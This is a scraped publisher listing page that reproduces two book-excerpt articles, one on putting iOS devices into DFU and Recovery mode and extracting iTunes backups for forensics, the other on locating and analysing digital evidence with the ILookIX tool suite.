user-friendly way to conduct penetration testing Summary Throughout this article, we learned the basics of Metasploit. We learned about various syntax and semantics of Metasploit commands. We also learned the benefits of using Metasploit. Resources for Article: Further resources on this subject: Approaching a Penetration Test Using Metasploit [article] Metasploit Custom Modules and Meterpreter Scripting [article] So, what is Metasploit? [article]
Read more
  • 0
  • 0
  • 17382
article-image-forensics-recovery
Packt
05 Jan 2016
6 min read
Save for later

Forensics Recovery

Packt
05 Jan 2016
6 min read
In this article by Bhanu Birani and Mayank Birani, the authors of the book, IOS Forensics Cookbook, we have discussed Forensics recovery; also, how it is important, when in some investigation cases there is a need of decrypting the information from the iOS devices. These devices are in an encrypted form usually. In this article, we will focus on various tools and scripts, which can be used to read the data from the devices under investigation. We are going to cover the following topics: DFU and Recovery mode Extracting iTunes backup (For more resources related to this topic, see here.) DFU and Recovery Mode In this section we'll cover both the DFU mode and the Recovery mode separately. DFU mode In this section, we will see how to launch the DFU mode, but before that we see what DFU means. DFU stands for Device Firmware Upgrade, which means this mode is used specifically while iOS upgrades. This is a mode where device can be connected with iTunes and still do not load iBoot boot loader. Your device screen will be completely black in DFU mode because neither the boot loader nor the operating system is loaded. DFU bypasses the iBoot so that you can downgrade your device. How to do it... We need to follow these steps in order to launch a device in DFU mode: Turn off your device. Connect your device to the computer. Press your Home button and the Power button, together, for 10 seconds. Now, release the Power button and keep holding the Home button till your computer detects the device that is connected. After sometime, iTunes should detect your device. Make sure that your phone does not show any Restore logo on the device, if it does, then you are in Recovery mode, not in DFU. Once your DFU operations are done, you can hold the Power and Home buttons till you see the Apple logo in order to return to the normal functioning device. This is the easiest way to recover a device from a faulty backup file. Recovery mode In this section, you will learn about the Recovery mode of our iOS devices. To dive deep into the Recovery mode, we fist need to understand a few basics such as which boot loader is been used by iOS devices, how the boot takes place, and so on. We will explore all such concepts in order to simplify the understanding of the Recovery mode. All iOS devices use the iBoot boot loader in order to load the operating systems. The iBoot's state, which is used for recovery and restore purposes, is called Recovery mode. iOS cannot be downgraded in this state as the iBoot is loaded. iBoot also prevents any other custom firmware to flash into device unless it is a jailbreak, that is, "pwned". How to do it... The following are the detailed steps to launch the Recovery mode on any iOS device: You need to turn off your iOS device in order to launch the Recovery mode. Disconnect all the cables from the device and remove it from the dock if it is connected. Now, while holding the Home button, connect your iOS device to the computer using the cable. Hold the Home button till you see the Connect to iTunes screen. Once you see the screen, you have entered the Recovery mode. Now you will receive a popup in your Mac saying "iTunes has detected your iDevice in recovery mode". Now you can use iTunes to restore the device in the Recovery mode. Make sure your data is backed up because the recovery will restore the device to Factory Settings. You can later restore from the backup as well. Once your Recovery mode operations are complete, you will need to escape from the Recovery mode. To escape, just press the power button and the home button concurrently for 10-12 seconds. Extracting iTunes backup Extracting the logical information from the iTunes backup is crucial for forensics investigation. There is a full stack of tools available for extracting data from the iTunes backup. They come in a wide variety, distributed from open source to paid tools. Some of these forensic tools are Oxygen Forensics Suite, Access Data MPE+, EnCase, iBackup Bot, DiskAid, and so on. The famous open source tools are iPhone backup analyzer and iPhone analyzer. In this section, we are going to learn how to use the iPhone backup extractor tools. How to do it... The iPhone backup extractor is an open source forensic tool, which can extract information from device backups. However, there is one constraint that the backup should be created from iTunes 10 onwards. Follow these steps to extract data from iTunes backup: Download the iPhone backup extractor from http://supercrazyawesome.com/. Make sure that all your iTunes backup is located at this directory: ~/Library/ApplicationSupports/MobileSync/Backup. In case you don't have the required backup at this location, you can also copy paste it. The application will prompt after it is launched. The prompt should look similar to the following screenshot: Now tap on the Read Backups button to read the backup available at ~/Library/ApplicationSupports/MobileSync/Backup. Now, you can choose any option as shown here: This tool also allows you to extract data for an individual application and enables you to read the iOS file system backup. Now, you can select the file you want to extract. Once the file is selected, click on Extract. You will be get a popup asking for the destination directory. This complete process should look similar to the following screenshot: There are various other tools similar to this; iPhone Backup Browser is one of them, where you can view your decrypted data stored in your backup files. This tool supports only Windows operating system as of now. You can download this software from http://code.google.com/p/iphonebackupbrowser/. Summary In this article, we covered how to launch the DFU and the DFU and the Recovery modes. We also learned to extract the logical information from the iTunes backup using the iPhone backup extractor tool. Resources for Article: Further resources on this subject: Signing up to be an iOS developer [article] Exploring Swift [article] Introduction to GameMaker: Studio [article]
Read more
  • 0
  • 0
  • 17242

article-image-selecting-and-analyzing-digital-evidence
Packt
08 Apr 2016
13 min read
Save for later

Selecting and Analyzing Digital Evidence

Packt
08 Apr 2016
13 min read
In this article, Richard Boddington, the author of Practical Digital Forensics, explains how the recovery and preservation of digital evidence has traditionally involved imaging devices and storing the data in bulk in a forensic file or, more effectively, in a forensic image container, notably the IlookIX .ASB container. The recovery of smaller, more manageable datasets from larger datasets from a device or network system using the ISeekDiscovery automaton is now a reality. Whether the practitioner examines an image container or an extraction of information in the ISeekDiscovery container, it should be possible to overview the recovered information and develop a clearer perception of the type of evidence that should be located. Once acquired, the image or device may be searched to find evidence, and locating evidence requires a degree of analysis combined with practitioner knowledge and experience. The process of selection involves analysis, and as new leads open up, the search for more evidence intensifies until ultimately, a thorough search is completed. The searching process involves the analysis of possible evidence, from which evidence may be discarded, collected, or tagged for later reexamination, thereby instigating the selection process. The final two stages of the investigative process are the validation of the evidence, aimed at determining its reliability, relevance, authenticity, accuracy, and completeness, and finally, the presentation of the evidence to interested parties, such as the investigators, the legal team, and ultimately, the legal adjudicating body. (For more resources related to this topic, see here.) Locating digital evidence Locating evidence from the all-too-common large dataset requires some filtration of extraneous material, which has, until recently, been a mainly manual task of sorting the wheat from the chaff. But it is important to clear the clutter and noise of busy operating systems and applications from which only a small amount of evidence really needs to be gleaned. Search processes involve searching in a file system and inside files, and common searches for files are based on names or patterns in their names, keywords in their content, and temporal data (metadata) such as the last access or written time. A pragmatic approach to the examination is necessary, where the onus is on the practitioner to create a list of key words or search terms to cull specific, probative, and case-related information from very large groups of files. Searching desktops and laptops Home computer networks are normally linked to the Internet via a modem and various peripheral devices: a scanner, printer, external hard drive, thumb drive storage device, a digital camera, a mobile phone and a range of users. In an office network this would be a more complicated network system. The linked connections between the devices and the Internet with the terminal leave a range of traces and logging records in the terminal and on some of the devices and the Internet. E-mail messages will be recorded externally on the e-mail server, the printer may keep a record of print jobs, the external storage devices and the communication media also leave logs and data linked to the terminal. All of this data may assist in the reconstruction of key events and provide evidence related to the investigation. Using the logical examination process (booting up the image) it is possible to recover a limited number of deleted files and reconstruct some of the key events of relevance to an investigation. It may not always be possible to boot up a forensic image and view it in its logical format, which is easier and more familiar to users. However, viewing the data inside a forensic image in it physical format provides unaltered metadata and a greater number of deleted, hidden and obscured files that provide accurate information about applications and files. It is possible to view the containers that hold these histories and search records that have been recovered and stored in a forensic file container. Selecting digital evidence For those unfamiliar with investigations, it is quite common to misread the readily available evidence and draw incorrect conclusions. Business managers attempting to analyze what they consider are the facts of a case would be wise to seek legal assistance in selecting and evaluating evidence on which they may wish to base a case. Selecting the evidence involves analysis of the located evidence to determine what events occurred in the system, their significance, and the probative value to the case. The selection analysis stage requires the practitioner to carefully examine the available digital evidence ensuring that they do not misinterpret the evidence and make imprudent presumptions without carefully cross-checking the information. It is a fact-finding process where an attempt is made to develop a plausible reconstruction of the facts. As in conventional crime investigations, practitioners should look for evidence that suggests or indicates motive (why?), means (how?) and opportunity (when?) for suspects to commit the crime, but in cases dependent on digital evidence, it can be a vexatious process. There are often too many potential suspects, which complicates the process of linking the suspect to the events. The following figure shows a typical family network setup using Wi-Fi connections to the home modem that facilitates connection to the Internet. In this case, the parents provided the broadband service for themselves and for three other family members. One of the children's girlfriend completed her university assignments on his computer and synchronized her iPad to his device. The complexity of a typical household network and determining the identity of the transgressor The complexity of a typical household network and determining the identity of the transgressor More effective forensic tools Various forensic tools are available to assist the practitioner in selecting and collating data for examination analysis and investigation. Sorting order from the chaos of even a small personal computer can be a time-consuming and frustrating process. As the digital forensic discipline develops, better and more reliable forensic tools have been developed to assist practitioners in locating, selecting, and collating evidence from larger, complex datasets. To varying degrees, most digital forensic tools used to view and analyze forensic images or attached devices provide helpful user interfaces for locating and categorizing information relevant to the examination. The most advanced application that provides access and convenient viewing of files is the Category Explorer feature in ILookIX, which divides files by type, signature, and properties. Category Explorer also allows the practitioner to create custom categories to group files by relevance. For example, in a criminal investigation involving a conspiracy, the practitioner could create a category for the first individual and a category for the second individual. As files are reviewed, they would then be added to either or both categories. Unlike tags, files can be added to multiple categories, and the categories can be given descriptive names. Deconstructing files The deconstruction of files involves processing compound files such as archives, e-mail stores, registry stores, or other files to extract useful and usable data from a complex file format and generate reports. Manual deconstruction adds significantly to the time taken to complete an examination. Deconstructable files are compound files that can be further broken down into smaller parts such as e-mails, archives, or thumb stores of JPG files. Once the deconstruction is completed, the files will either move into the deconstructed files or deconstruction failed files folders. Deconstructable files will now be now broken out more—e-mail, graphics, archives, and so on. Searching for files Indexing is the process of generating a table of text strings that can then be searched almost instantly any number of times. The two main uses of indexing are to create a dictionary to use when cracking passwords and to index the words for almost-instant searching. Indexing is also valuable when creating a dictionary or using any of the analysis functions built in to ILookIX. ILookIX facilitates the indexing of the entire media at the time of initial processing, all at once. This can also be done after processing. Indexing facilitates searching through files and archives, Windows Registry, e-mail lists, and unallocated space. This function is highly customizable via the setup option in order to optimize for searching or for creating a custom dictionary for password cracking. Sound indexing ensures speedy and accurate searching. Searching is the process of having ILookIX look through the evidence for a specific item, such as a string of text or an expression. An expression, in terms of searching, is a pattern used to structure data in a search, such as a credit card number or e-mail address. The Event Analysis tool ILookIX's Event Analysis tool provides the practitioner a graphical representation of events on the subject system, such as file creation, access, or modification; e-mails sent or received; and other events such as the modification of the Master File Table on an NTFS system. The application allows the practitioner to zoom in on any point on the graph to view more specific details. Clicking on any bar on the graph will return the view to the main ILookIX window and display the items from the date bar selected in the List Pane. This can be most helpful when analyzing events during specific periods. The Lead Analysis tool Lead Analysis is an interactive evidence model embedded in ILookIX that allows the practitioner to assimilate known facts into a graphic representation that directly links unseen objects. It provides the answers as the practitioner increases the detail of the design surface and brings into view specific relationships that could go unseen otherwise. The primary aim of Lead Analysis is to help discover links within the case data that may not be evident or intuitive and the practitioner may not be aware of directly or that the practitioner has little background knowledge of to help form relationships manually. Instead of finding and making note of various pieces of information, the analysis is presented as an easy-to-use link model. The complexity of the modeling is removed so that it gives the clearest possible method of discovery. The analysis is based on the current index database, so it is essential to index case data prior to initiating an analysis. Once a list of potential links has been generated, it is important to review them to see whether any are potentially relevant. Highlight any that are, and it will then be possible to look for words in the catalogues if they have been included. In the example scenario, the word divorce was located as it was known that Sarah was divorced from the owner of the computer (the initial suspect). By selecting any word by left-clicking on it once and clicking on the green arrow to link it to Sarah, as shown below, relationships can be uncovered that are not always clear during the first inspection of the data. Each of the stated facts becomes one starting lead on the canvas. If the nodes are related, it is easy to model that relationship by manually linking them together by selecting the first Lead Project to link, right-clicking, and selecting Add a New Port from the menu. This is then repeated for the second Lead Object the practitioner wants to link. By simply clicking on the new port of the selected object that needs to be linked from and dragging to the port of the Lead Object that it should be linked to, a line will appear linking the two together. It is then possible to iterate this process using each start node or discovered node until it is possible to make sense of the total case data. A simple relationship between suspects, locations and even concepts is illustrated in the following screenshot: ILookIX Lead Analysis discovering relationships between various entities ILookIX Lead Analysis discovering relationships between various entities Analyzing e-mail datasets Analyzing and selecting evidence from large e-mail datasets is a common task for the practitioner. ILookIX's embedded application E-mail Linkage Analysis is an interactive evidence model to help practitioners discover links between the correspondents within e-mail data. The analysis is presented as an easy-to-use link model; the complexity of the modeling is removed to provide the clearest possible method of discovery. The results of analysis are saved at the end of the modeling session for future editing. If there is a large amount of e-mail to process, this analysis generation may take a few minutes. Once the analysis is displayed, the user will see the e-mail linkage itself. It is then possible to see a line between correspondents indicating that they have a relationship of some type. Here in particular, line thickness indicates the frequency of traffic between two correspondents; therefore, thicker flow lines indicate more traffic. On the canvas, once the analysis is generated, the user may select any e-mail addressee node by left-clicking on it once. Creating the analysis is really simple, and one of the most immediately valuable resources this provides is group identification, as shown in the following screenshot. ILookIX will initiate a search for that addressee and list all e-mails where your selected addressee was a correspondent. Users may make their own connection lines by clicking on an addressee node point and dragging to another node point. Nodes can be deleted to allow linkage between smaller groups of individuals. The E-mail Linkage tool showing relationships of possible relevance to a case The E-mail Linkage tool showing relationships of possible relevance to a case The Volume Shadow Copy analysis tools Shadow volumes, also known as the Volume Snapshot Service (VSS), use a service that creates point-in-time copies of files. The service is built in to versions of Windows Vista, 7, 8, and 10 and is turned on by default. ILookIX can recover true copies of overwritten files from shadow volumes, as long as they resided on the volume at the time that the snapshot was created. VSS recovery is a method of recovering extant and deleted files from the volume snapshots available on the system. IlookIX, unlike any other forensic tool, is capable of reconstructing volume shadow copies, either differential or full, including deleted files and folders. In the test scenario, the tool recovered a total of 87,000 files, equating to conventional tool recovery rates. Using ILookIX's Xtreme File Recovery, some 337,000 files were recovered. The Maximal Full Volume Shadow Snapshot application recovered a total of 797,00 files. Using the differential process, 354,000 files were recovered, which filtered out 17,000 additional files for further analysis. This enabled the detection of e-mail messages and attachments and Windows Registry changes that would normally remain hidden. Summary This article described in detail the process of locating and selecting evidence in terms of a general process. It also further explained the nature of digital evidence and provided examples of its value in supporting a legal case. Various advanced analysis and recovery tools were demonstrated that show the reader how technology can speed up and make more efficient the location and selection processes. Some of these tools are not new but have been enhanced, while others are innovative and seek out evidence normally unavailable to the practitioner. Resources for Article: Further resources on this subject: Mobile Phone Forensics – A First Step into Android Forensics [article] Introduction to Mobile Forensics [article] BackTrack Forensics [article]
Read more
  • 0
  • 0
  • 17087
Modal Close icon
Modal Close icon